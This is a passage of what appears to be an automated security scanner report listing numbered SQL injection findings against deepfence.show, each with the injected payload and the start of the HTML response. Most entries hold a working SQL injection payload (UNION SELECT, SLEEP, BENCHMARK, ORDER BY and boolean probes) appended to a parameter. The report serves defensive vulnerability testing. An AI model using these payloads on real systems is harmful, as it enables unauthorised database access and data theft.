href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1093\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1094\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'*'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1095Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1096\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1097\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1098\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1099\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7506=9091 AND (5913=5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1100\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1101\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1102\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'=0--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1103\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1104\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1105\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1106Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 